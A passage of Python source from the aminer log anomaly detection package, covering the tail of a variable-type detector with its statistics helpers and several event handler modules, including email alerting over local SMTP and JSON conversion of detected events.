self.num_var_type_considered_ind # Appends the positive differnces of the probabilities to diff_list for type_index, type_val in enumerate(var_val): if self.var_type_history_list_reference[event_index][var_index][1] == len_ref and sum(var_val[1]) < len_cur: diff_list.append(1) break # Differentiation of the entries, which are lists (e.g. discrete, range, continuously distributed) if type_index in [2, self.var_type_history_list_order.index('range'), self.var_type_history_list_order.index('cont')]: if type_index == self.var_type_history_list_order.index('cont'): # Continuously distributed variable type if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0: diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: var_type_ev = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][ -self.num_var_type_considered_ind:] if x != 0]), 1) var_type_sd = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][ -self.num_var_type_considered_ind:] if x != 0]), 1) # Formula to include the impact of the mean, standard deviation and changes of the distribution if max(self.var_type_history_list_reference[event_index][var_index][type_index][1], var_type_sd) > 0: diff_list.append((min(1, abs((self.var_type_history_list_reference[event_index][var_index][ type_index][0] - var_type_ev) / max(abs(self.var_type_history_list_reference[event_index][var_index][ type_index][0]), abs(var_type_ev))) / 3 + abs((self.var_type_history_list_reference[event_index][ var_index][type_index][1] - var_type_sd) / max(abs(self.var_type_history_list_reference[ event_index][var_index][type_index][1]), abs(var_type_sd))) / 3 + 1 / 3) * len([ x for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0])) / len_cur) else: diff_list.append(0) elif type_index == self.var_type_history_list_order.index('range'): # range type if self.var_type_history_list_reference[event_index][var_index][type_index][0] == 0: diff_list.append(len([1 for x in type_val[1][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: # Calculate the lower and upper limits lower_limit_cur = sum(type_val[0][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[0][ -self.num_var_type_considered_ind:] if x != 0]), 1) upper_limit_cur = sum(type_val[1][-self.num_var_type_considered_ind:]) / max(len([1 for x in type_val[1][ -self.num_var_type_considered_ind:] if x != 0]), 1) lower_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][0] upper_limit_ref = self.var_type_history_list_reference[event_index][var_index][type_index][1] # Check if the current history contains at least one range type if lower_limit_cur != upper_limit_cur: # Check if the two intervalls intercept if (upper_limit_ref > lower_limit_cur) and (upper_limit_cur > lower_limit_ref): diff_list.append( (max(0, lower_limit_ref - lower_limit_cur) + max(0, upper_limit_cur - upper_limit_ref)) / (max(upper_limit_cur, upper_limit_ref) - min(lower_limit_cur, lower_limit_ref)) * len([1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: diff_list.append(len([1 for x in type_val[0][-self.num_var_type_considered_ind:] if x != 0]) / len_cur) else: diff_list.append(0) else: tmp_max = 0 for j, val in enumerate(type_val): if j == 0 and self.var_type_history_list_reference[event_index][var_index][type_index][j] == 0: tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur - self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref)) else: tmp_max = max(tmp_max, (sum(val[-self.num_var_type_considered_ind:]) / len_cur - self.var_type_history_list_reference[event_index][var_index][type_index][j] / len_ref) / 2) diff_list.append(tmp_max) else: if self.var_type_history_list_reference[event_index][var_index][type_index] == 0: diff_list.append(sum(type_val[-self.num_var_type_considered_ind:]) / len_cur) else: diff_list.append(max(0, (sum(type_val[-self.num_var_type_considered_ind:]) / len_cur - self.var_type_history_list_reference[event_index][var_index][type_index] / len_ref)) / 2) if len(diff_list) == 0: indicator_list.append(0) else: indicator_list.append(sum(diff_list)) return indicator_list def bt_min_successes(self, num_bt, p, alpha): # skipcq: PYL-R0201 """ Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = np.math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * np.math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return num_bt - i return 0 def bt_min_successes_multi_p(self, num_bt, p_list, alpha, event_index, var_index): """ Calculate the minimal number of successes for the BT with significance alpha. p_list is a list of probabilities of successes and num_bt is the number of observed tests. """ if f'num_bt = {num_bt}, alpha = {alpha}' in self.bt_min_succ_data: # Here the min_successes are not being generated, but instead the right Indices are searched for in the bt_min_succ_data-list return np.searchsorted(self.bt_min_succ_data[f'num_bt = {num_bt}, alpha = {alpha}'], p_list, side='left', sorter=None) # Calculate the min_successes normally for each value one by one tmp_list = [] for i in range(len(self.var_type[event_index][var_index][1])): # skipcq: PTC-W0060 tmp_list.append(self.bt_min_successes(num_bt, p_list[i], alpha)) tmp_list = np.array(tmp_list) return tmp_list def print_initial_var_type(self, event_index, log_atom): """Print the initial variable types.""" if self.silence_output_without_confidence or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) message = f'Initial detection of variable types of event {self.event_type_detector.get_event_type(event_index)}:' tmp_string = '' type_info = {} for var_index in range(self.length[event_index]): if self.var_type[event_index][var_index]: tmp_string += f" Path '{self.event_type_detector.variable_key_list[event_index][var_index]}': " \ f"{get_vt_string(self.var_type[event_index][var_index])}\n" type_info[self.event_type_detector.variable_key_list[event_index][var_index]] = self.var_type[event_index][var_index] tmp_string = tmp_string.lstrip(' ') original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: sorted_log_lines = [tmp_string + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [tmp_string + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': type_info, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': type_info} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) def print_changed_var_type(self, event_index, vt_old, vt_new, var_index, log_atom, confidence=None): """Print the changed variable types.""" if self.save_statistics and ((self.num_updates_until_var_reduction > 0 and ( self.event_type_detector.num_event_lines[event_index] - self.num_init) / self.num_update >= self.num_updates_until_var_reduction - 1)): self.changed_var_types.append(self.event_type_detector.num_event_lines[event_index]) if (self.silence_output_without_confidence and confidence is None) or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [ ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'from': vt_old[0], 'to': vt_new[0], 'lines': self.event_type_detector.num_event_lines[event_index]}} vt_old_string = get_vt_string(vt_old) vt_new_string = get_vt_string(vt_new) for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event " f"{self.event_type_detector.get_event_type(event_index)} changed from { vt_old_string} to {vt_new_string} after the " f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self) def print_reject_var_type(self, event_index, vt, var_index, log_atom): """Print the changed variable types.""" if self.silence_output_without_confidence or self.silence_output_except_indicator: return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: sorted_log_lines = [ ' ' + self.event_type_detector.variable_key_list[event_index][var_index] + os.linesep + data] analysis_component = {'AffectedLogAtomPaths': [self.event_type_detector.variable_key_list[event_index][var_index]]} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[event_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'reject': vt[0], 'lines': self.event_type_detector.num_event_lines[event_index]}} for listener in self.anomaly_event_handlers: listener.receive_event( f'Analysis.{self.__class__.__name__}', f"Variable type of path '{self.event_type_detector.variable_key_list[event_index][var_index]}' of event " f"{self.event_type_detector.get_event_type(event_index)} would reject the type '{vt[0]}' after the " f"{self.event_type_detector.num_event_lines[event_index]}-th analysed line", sorted_log_lines, event_data, log_atom, self) def print(self, message, log_atom, affected_path, confidence=None, indicator=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] if (self.silence_output_without_confidence and confidence is None) or ( self.silence_output_except_indicator and indicator is None): return try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + data] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + data] analysis_component = {'AffectedLogAtomPaths': affected_path} if self.event_type_detector.id_path_list != []: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}, 'IDpaths': self.event_type_detector.id_path_list, 'IDvalues': list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index])} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'Confidence': confidence, 'Indicator': indicator}} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ if AminerConfig.STAT_LEVEL == 1: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the " "last 60 minutes.", component_name, self.log_success, self.log_total, self.log_new_learned, self.log_updated) elif AminerConfig.STAT_LEVEL == 2: logging.getLogger(STAT_LOG_NAME).info( "'%s' processed %s out of %s log atoms successfully and learned %s new variable types and updated %s variable types in the " "last 60 minutes. Following new variable types were learned: %s", component_name, self.log_success, self.log_total, self.log_new_learned, self.log_updated, self.log_new_learned_values) self.log_success = 0 self.log_total = 0 self.log_new_learned = 0 self.log_new_learned_values = [] self.log_updated = 0 def convert_to_floats(list_in): """Give back false if one entry of the list is no float and returns the list of floats otherwise.""" num_list = [] for item in list_in: try: num_list.append(float(item)) except (ValueError, TypeError): return [] return num_list def consists_of_floats(list_in): """Give back false if one entry of the list is no float or integer. True otherwise.""" return all(isinstance(x, (float, int)) for x in list_in) def consists_of_ints(list_in): """Give back True if all entries are integers an False otherwise.""" return all(item == int(item) for item in list_in) def get_vt_string(vt): """Return a string which states the variable type with selected parameters.""" if vt[0] == 'stat': return_string = f'{vt[0]} {vt[1]}' elif vt[0] == 'd': return_string = vt[0] + ' [' for i, val in enumerate(vt[2]): if val >= 0.1: return_string += f'"{str(vt[1][i])}"({str(int(val*100+0.5))}%), ' if any(val < 0.1 for _, val in enumerate(vt[2])): return_string += '...]' else: return_string = return_string[:-2] return_string += ']' elif vt[0] in ('asc', 'desc'): return_string = f'{vt[0]} [{vt[1]}]' elif vt[0] == 'unq': return_string = vt[0] elif vt[0] == 'others': return_string = vt[0] elif vt[0] == 'range': return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]' elif vt[0] == 'uni': return_string = f'{vt[0]} [min: {vt[1]}, max: {vt[2]}]' elif vt[0] == 'nor': return_string = f'{vt[0]} [EV: {vt[1]}, SD: {vt[2]}]' elif vt[0] == 'spec': return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]' elif vt[0] == 'beta': if vt[5] == 1: return_string = f'{vt[0]}{vt[5]} [min: {vt[3]}, max: {vt[4]}]' else: return_string = f'{vt[0]}{vt[5]} [EV: {vt[1]}, SD: {vt[2]}]' elif vt[0] == 'betam': return_string = f'{vt[0]} [min: {vt[3]}, max: {vt[4]}, proportion: {vt[5]}]' else: return_string = vt[0] return return_string def cramervonmises(rvs, cdf, args=()): """Return the cramer von mises gof test statistic.""" if isinstance(cdf, str): cdf = getattr(distributions, cdf).cdf vals = np.sort(np.asarray(rvs)) if vals.size <= 1: raise ValueError('The sample must contain at least two observations.') if vals.ndim > 1: raise ValueError('The sample must be one-dimensional.') n = len(vals) cdfvals = cdf(vals, *args) sum_val = 0 for i in range(n): sum_val += ((2*i+1)/(2*n)-cdfvals[i])**2 return 1/(12*n) + sum_val def cramervonmises2(rvs1, rvs2): """Return the cramer von mises two sample homogeneity test statistic.""" vals1 = np.sort(np.asarray(rvs1)) vals2 = np.sort(np.asarray(rvs2)) if vals1.size <= 1 or vals2.size <= 1: raise ValueError('The sample must contain at least two observations.') if vals1.ndim > 1 or vals2.ndim > 1: raise ValueError('The sample must be one-dimensional.') n1 = len(vals1) n2 = len(vals2) sum_val = 0 index1 = 0 index2 = 0 for i in range(n1+n2): if index1 < n1 and (index2 == n2-1 or vals1[index1] < vals2[index2]): sum_val += n1*(i-index1)**2 index1 += 1 else: sum_val += n2*(i-index2)**2 index2 += 1 return sum_val/(n1*n2*(n1+n2)) - (1*n1*n2-1)/(6*(n1+n2)) def durbin_watson(rvs): """Return the durbin watson test statistic.""" return sum((rvs[i+1] - rvs[i])**2 for i in range(len(rvs) - 1)) / sum(rvs[i]**2 for i in range(len(rvs))) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events/000077500000000000000000000000001437606560100305135ustar00rootroot00000000000000DefaultMailNotificationEventHandler.py000066400000000000000000000223241437606560100400470ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events""" This module defines the event handler for reporting via emails. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import shlex import time import re from smtplib import SMTP, SMTPException import logging import sys from aminer.AminerConfig import DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.events.EventInterfaces import EventHandlerInterface from aminer.events.EventData import EventData _message_str = """From: %s To: %s Subject: %s %s """ class DefaultMailNotificationEventHandler(EventHandlerInterface, TimeTriggeredComponentInterface): """ This class implements an event record listener. It will pool received events, reduce the amount of events below the maximum number allowed per timeframe, create text representation of received events and send them via "sendmail" transport. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME CONFIG_KEY_MAIL_TARGET_ADDRESS = 'MailAlerting.TargetAddress' CONFIG_KEY_MAIL_FROM_ADDRESS = 'MailAlerting.FromAddress' CONFIG_KEY_MAIL_SUBJECT_PREFIX = 'MailAlerting.SubjectPrefix' CONFIG_KEY_MAIL_ALERT_GRACE_TIME = 'MailAlerting.AlertGraceTime' CONFIG_KEY_EVENT_COLLECT_TIME = 'MailAlerting.EventCollectTime' CONFIG_KEY_ALERT_MIN_GAP = 'MailAlerting.MinAlertGap' CONFIG_KEY_ALERT_MAX_GAP = 'MailAlerting.MaxAlertGap' CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE = 'MailAlerting.MaxEventsPerMessage' def __init__(self, analysis_context): """ Initialize the event handler. @param analysis_context used to get the aminer config and the config_properties. """ self.analysis_context = analysis_context aminer_config = analysis_context.aminer_config # @see https://emailregex.com/ is_email = re.compile(r"(^[a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-]+$)|^[a-zA-Z0-9]+@localhost$") self.recipient_address = shlex.quote( aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_TARGET_ADDRESS)) if self.recipient_address is None: msg = 'Cannot create e-mail notification listener without target address' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.sender_address = shlex.quote( aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_FROM_ADDRESS)) if not is_email.match(self.recipient_address) or not is_email.match(self.sender_address): msg = 'MailAlerting.TargetAddress and MailAlerting.FromAddress must be email addresses!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.subject_prefix = shlex.quote( aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_SUBJECT_PREFIX, 'aminer Alerts:')) self.alert_grace_time_end = aminer_config.config_properties.get( DefaultMailNotificationEventHandler.CONFIG_KEY_MAIL_ALERT_GRACE_TIME, 0) self.event_collect_time = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_EVENT_COLLECT_TIME, 10) self.min_alert_gap = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_ALERT_MIN_GAP, 600) self.max_alert_gap = aminer_config.config_properties.get(DefaultMailNotificationEventHandler.CONFIG_KEY_ALERT_MAX_GAP, 600) self.max_events_per_message = aminer_config.config_properties.get( DefaultMailNotificationEventHandler.CONFIG_KEY_ALERT_MAX_EVENTS_PER_MESSAGE, 1000) if self.alert_grace_time_end > 0: self.alert_grace_time_end += time.time() self.events_collected = 0 self.event_collection_start_time = 0 self.last_alert_time = 0 self.next_alert_time = 0 self.current_alert_gap = self.min_alert_gap self.current_message = '' def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, 'output_event_handlers') and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return if self.alert_grace_time_end != 0: if self.alert_grace_time_end >= time.time(): return self.alert_grace_time_end = 0 component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return # Avoid too many calls to the operating system time() current_time = time.time() if self.events_collected < self.max_events_per_message: if self.events_collected == 0: self.event_collection_start_time = current_time self.events_collected += 1 event_data_obj = EventData(event_type, event_message, sorted_loglines, event_data, log_atom, event_source, self.analysis_context) self.current_message += event_data_obj.receive_event_string() if self.next_alert_time == 0: if self.last_alert_time != 0: # This is the first event received after sending of a previous notification. If the currentAlertGap has not elapsed, # increase the gap immediately. self.next_alert_time = self.last_alert_time + self.current_alert_gap if self.next_alert_time < current_time: # We are already out of the required gap. self.current_alert_gap = self.min_alert_gap self.last_alert_time = 0 self.next_alert_time = current_time + self.event_collect_time else: # Increase the gap self.current_alert_gap *= 1.5 if self.current_alert_gap > self.max_alert_gap: self.current_alert_gap = self.max_alert_gap else: # No relevant last alert time recorded, just use default. self.next_alert_time = current_time + self.event_collect_time if (self.next_alert_time != 0) and (current_time >= self.next_alert_time): self.send_notification(current_time) def do_timer(self, trigger_time): """Check exit status of previous mail sending procedures and check if alerts should be sent.""" if (self.next_alert_time != 0) and (trigger_time >= self.next_alert_time): self.send_notification(trigger_time) return 10 def send_notification(self, trigger_time): """Really send out the message.""" if self.events_collected == 0: return subject_text = f'{self.subject_prefix} Collected Events' if self.last_alert_time != 0: subject_text += f' in the last {trigger_time - self.last_alert_time} seconds' message = _message_str % (self.sender_address, self.recipient_address, subject_text, self.current_message) try: # timeout explicitly needs to be set None, because in python version < 3.7 socket.settimeout() sets the socket type # SOCK_NONBLOCKING and the code fails. smtp_obj = SMTP('127.0.0.1', port=25, timeout=5) smtp_obj.sendmail(self.sender_address, self.recipient_address, message) smtp_obj.quit() except SMTPException as e: print(e, file=sys.stderr) logging.getLogger(DEBUG_LOG_NAME).error(e) self.last_alert_time = trigger_time self.events_collected = 0 self.current_message = '' self.next_alert_time = 0 logging.getLogger(DEBUG_LOG_NAME).debug("%s sent notification.", self.__class__.__name__) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events/EventData.py000066400000000000000000000076511437606560100327510ustar00rootroot00000000000000# skipcq: FLK-D400 """ This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from datetime import datetime from aminer.AminerConfig import CONFIG_KEY_LOG_LINE_PREFIX from aminer import AminerConfig class EventData: """This class is used to create a string for different event handlers.""" def __init__(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source, analysis_context): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. @param analysis_context the analysis context used to get the component. """ self.event_type = event_type self.event_message = event_message self.sorted_log_lines = sorted_loglines self.event_data = event_data self.event_source = event_source self.analysis_context = analysis_context if analysis_context is not None: self.description = f'"{analysis_context.get_name_by_component(event_source)}"' else: self.description = "" if log_atom is None: return self.log_atom = log_atom def receive_event_string(self): """Receive an event string.""" message = "" if self.event_message is not None: indent = " " if hasattr(self, "log_atom"): if self.log_atom.get_timestamp() is None: import time self.log_atom.set_timestamp(time.time()) message += f"{datetime.fromtimestamp(self.log_atom.get_timestamp()).strftime('%Y-%m-%d %H:%M:%S')} " message += f"{self.event_message}\n" message += f"{self.event_source.__class__.__name__}: {self.description} ({len(self.sorted_log_lines)} lines)\n" else: message += f"{self.event_message} ({len(self.sorted_log_lines)} lines)\n" else: indent = "" for line in self.sorted_log_lines: if isinstance(line, bytes): # skipcq: PTC-W0048 if line != b"": message += indent + line.decode(AminerConfig.ENCODING) + "\n" else: original_log_line_prefix = self.analysis_context.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX) if original_log_line_prefix is not None and line.startswith(original_log_line_prefix): message += line + "\n" elif line != "": message += indent + line + "\n" if self.event_message is None: # remove last newline message = message[:-1] return message EventInterfaces.py000066400000000000000000000064551437606560100341050ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events""" This file contains interface definition useful implemented by classes in this directory and for use from code outside this directory. All classes are defined in separate files, only the namespace references are added here to simplify the code. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import abc class EventHandlerInterface(metaclass=abc.ABCMeta): """ This is the common interface of all components that can be notified on significant log data mining events. To avoid interference with the analysis process, the listener may only perform fast actions within the call. Longer running tasks have to be performed asynchronously. """ @abc.abstractmethod def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ class EventSourceInterface(metaclass=abc.ABCMeta): """ This is the common interface of all event sources. Component not implementing this interface may still emit events without support for callbacks. """ @abc.abstractmethod def allowlist_event(self, event_type, event_data, allowlisting_data): """ Allowlist an event generated by this source using the information emitted when generating the event. @return a message with information about allowlisting @throws NotImplementedError if this source does not support allowlisting per se @throws Exception when allowlisting of this special event using given allowlisting_data was not possible. """ @staticmethod def get_weight_analysis_field_path(): """Return the path to the list in the output of the detector which is weighted by the ScoringEventHandler.""" return [] @staticmethod def get_weight_output_field_path(): """Return the path where the ScoringEventHandler adds the scorings in the output of the detector.""" return [] JsonConverterHandler.py000066400000000000000000000152131437606560100351070ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/events"""This module defines an event handler that converts an event to JSON. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import json import time import copy from aminer.events.EventInterfaces import EventHandlerInterface from aminer import AminerConfig class JsonConverterHandler(EventHandlerInterface): """This class implements an event record listener, that will convert event data to JSON format.""" def __init__(self, json_event_handlers, analysis_context, pretty_print=True): """ Initialize the event handler. @param json_event_handlers the event handlers to which the json converted data is sent. @param analysis_context the analysis context used to get the component. @param pretty_print if true, the json is printed pretty; otherwise the json is printed with less space needed. """ self.json_event_handlers = json_event_handlers self.analysis_context = analysis_context self.pretty_print = pretty_print def receive_event(self, event_type, event_message, sorted_loglines, event_data, log_atom, event_source): """ Receive information about a detected event. @param event_type is a string with the event type class this event belongs to. This information can be used to interpret type-specific event_data objects. Together with the eventMessage and sorted_loglines, this can be used to create generic log messages. @param event_message the first output line of the event. @param sorted_loglines sorted list of log lines that were considered when generating the event, as far as available to the time of the event. The list has to contain at least one line. @param event_data type-specific event data object, should not be used unless listener really knows about the event_type. @param log_atom the log atom which produced the event. @param event_source reference to detector generating the event. """ if hasattr(event_source, 'output_event_handlers') and event_source.output_event_handlers is not None and self not in \ event_source.output_event_handlers: return component_name = self.analysis_context.get_name_by_component(event_source) if component_name in self.analysis_context.suppress_detector_list: return if 'StatusInfo' in event_data: # No anomaly; do nothing on purpose pass else: log_data = {} try: data = log_atom.raw_data.decode(AminerConfig.ENCODING) except UnicodeError: data = repr(log_atom.raw_data) log_data['RawLogData'] = [data] if log_atom.get_timestamp() is None: log_atom.set_timestamp(time.time()) log_data['Timestamps'] = [round(log_atom.atom_time, 2)] log_data['DetectionTimestamp'] = round(time.time(), 2) log_data['LogLinesCount'] = len(sorted_loglines) if log_atom.parser_match is not None and hasattr(event_source, 'output_logline') and event_source.output_logline: log_data['AnnotatedMatchElement'] = {} for path, match in log_atom.parser_match.get_match_dictionary().items(): if isinstance(match, list): for match_element_id, match_element in enumerate(match): if isinstance(match_element.match_object, bytes): log_data['AnnotatedMatchElement'][path + '/' + str(match_element_id)] = match_element.match_object.decode( AminerConfig.ENCODING) else: log_data['AnnotatedMatchElement'][path + '/' + str(match_element_id)] = str(match_element.match_object) elif isinstance(match.match_object, bytes): log_data['AnnotatedMatchElement'][path] = match.match_object.decode(AminerConfig.ENCODING) else: 